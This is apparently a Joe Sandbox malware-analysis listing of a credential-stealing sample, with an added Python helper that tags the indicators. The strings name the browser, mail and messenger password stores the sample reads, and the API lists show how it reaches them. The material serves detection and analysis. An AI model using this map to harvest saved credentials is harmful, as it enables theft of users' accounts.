                                                                                            control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                                            APIs
                                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                            • memset.MSVCRT ref: 00410E10
                                                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 119022999-2036018995
                                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                            Control-flow Graph (basic blocks and edges):
                                                                                            control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                            APIs
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                            • memset.MSVCRT ref: 00408620
                                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                            • memset.MSVCRT ref: 00408671
                                                                                            Strings
                                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                                            • API String ID: 3996936265-1079885057
                                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                            Control-flow Graph (basic blocks and edges):
                                                                                            control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                            APIs
                                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$_strcmpimemset
                                                                                            • String ID: /stext
                                                                                            • API String ID: 520177685-3817206916
                                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
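The entries above put credential-store locations and the APIs that touch them side by side: the Software\Google\Google Talk\Accounts key next to RegEnumKeyExA, the *.oeaccount pattern in the stack arguments of the FindClose call, the Shell Folders registry key in the same function that resolves SHGetSpecialFolderPathA from shell32.dll, and the PrivateProfile INI functions near the /stext, /sort and /nosort option strings. The Python below is an added triage helper, not part of the Joe Sandbox report and not code recovered from the sample: it parses function entries written in this report's text layout and tags each one with the kind of indicator its API/string combination suggests. The sample text is constructed from entries on this page; the tag rules (what a combination "means") are this example's own assumption, not a Joe Sandbox signature.

```python
"""Triage helper for Joe Sandbox memory-dump function listings.

Added example, not part of the report and not code from the sample. It
parses entries in the report's text layout and applies assumed tag rules.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: entries copied in the report's layout from this page.
SAMPLE = r"""APIs
• memset.MSVCRT ref: 004109F7
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
• GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
APIs
  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
• memset.MSVCRT ref: 00410E10
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
Similarity
• API ID: AddressLibraryLoadProcVersion_mbscpymemset
APIs
  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
APIs
• FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
Similarity
• API ID: CloseFind
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Similarity")
# One API bullet: optional "Part of subcall" prefix, name.module(args), ref.
API_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-F]+: )?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
STR_RE = re.compile(r"^(?P<s>.+?), xrefs: (?P<x>.+)$")

# Assumed indicator rules (this example's own, not from the report).
INI_APIS = {"GetPrivateProfileStringA", "GetPrivateProfileIntA", "WritePrivateProfileStringA"}
IDENT_APIS = {"GetUserNameA", "GetComputerNameA"}


@dataclass
class Entry:
    apis: list = field(default_factory=list)     # (name, module, args, ref)
    strings: list = field(default_factory=list)  # referenced string literals
    api_id: str = ""
    tags: set = field(default_factory=set)


def parse(text):
    """Split the listing into entries; each entry starts at an 'APIs' heading."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = Entry()
                entries.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
                cur.apis.append((m["api"], m["mod"], args, m["ref"]))
        elif section == "Strings":
            m = STR_RE.match(body)
            if m:
                cur.strings.append(m["s"])
        elif section == "Similarity" and body.startswith("API ID:"):
            cur.api_id = body[len("API ID:"):].strip()
    return entries


def tag(entry):
    """Attach indicator tags to one entry using the assumed rules above."""
    apis = {a[0] for a in entry.apis}
    args = {arg for a in entry.apis for arg in a[2]}
    if apis & INI_APIS:
        entry.tags.add("ini-profile-io")
    if "SHGetSpecialFolderPathA" in args or any("Shell Folders" in s for s in entry.strings):
        entry.tags.add("profile-path-lookup")
    if any(s.endswith("Google Talk\\Accounts") for s in entry.strings):
        entry.tags.add("credential-store:google-talk")
    if any(a.endswith(".oeaccount") for a in args):
        entry.tags.add("credential-store:oeaccount")
    if "RegEnumKeyExA" in apis and any("Accounts" in s for s in entry.strings):
        entry.tags.add("registry-account-enum")
    if apis & IDENT_APIS:
        entry.tags.add("host-identification")
    return entry


def triage(text):
    return [tag(e) for e in parse(text)]


def credential_stores(text):
    """Sorted names of credential stores referenced anywhere in the listing."""
    found = {t.split(":", 1)[1] for e in triage(text) for t in e.tags
             if t.startswith("credential-store:")}
    return sorted(found)


if __name__ == "__main__":
    for i, e in enumerate(triage(SAMPLE)):
        print(f"entry {i}: apis={sorted({a[0] for a in e.apis})} tags={sorted(e.tags)}")
    print("credential stores:", credential_stores(SAMPLE))
```

Run it over the text of a whole "Memory Dump" section rather than the constructed sample to get the same per-function tags for every entry; the parser keys on the section headings, so the deep indentation and the control-flow-graph lines in the exported report are ignored. The rules are deliberately narrow and only cover the combinations visible on this page; a real triage table would be extended as further entries are read.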
                                                                                            APIs
                                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 145871493-0
                                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                            APIs
                                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                            • String ID:
                                                                                            • API String ID: 4165544737-0
                                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                            • memset.MSVCRT ref: 0040128E
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                            Similarity
                                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                            APIs
                                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                            • strlen.MSVCRT ref: 0040F139
                                                                                            • strlen.MSVCRT ref: 0040F147
                                                                                            • memset.MSVCRT ref: 0040F187
                                                                                            • strlen.MSVCRT ref: 0040F196
                                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                                            • strlen.MSVCRT ref: 0040F207
                                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                            Similarity
                                                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                            APIs
                                                                                            • strchr.MSVCRT ref: 004100E4
                                                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                                            • memset.MSVCRT ref: 00410129
                                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                            • memset.MSVCRT ref: 00410171
                                                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                            • String ID: \systemroot
                                                                                            APIs
                                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                            • strchr.MSVCRT ref: 0040327B
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringstrchr
                                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040810E
                                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,679D7B60,?), ref: 004081B9
                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                            Similarity
                                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091EC
                                                                                            • sprintf.MSVCRT ref: 00409201
                                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                            Similarity
                                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                            • String ID: caption$dialog_%d
                                                                                            • API String ID: 2923679083-4161923789
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
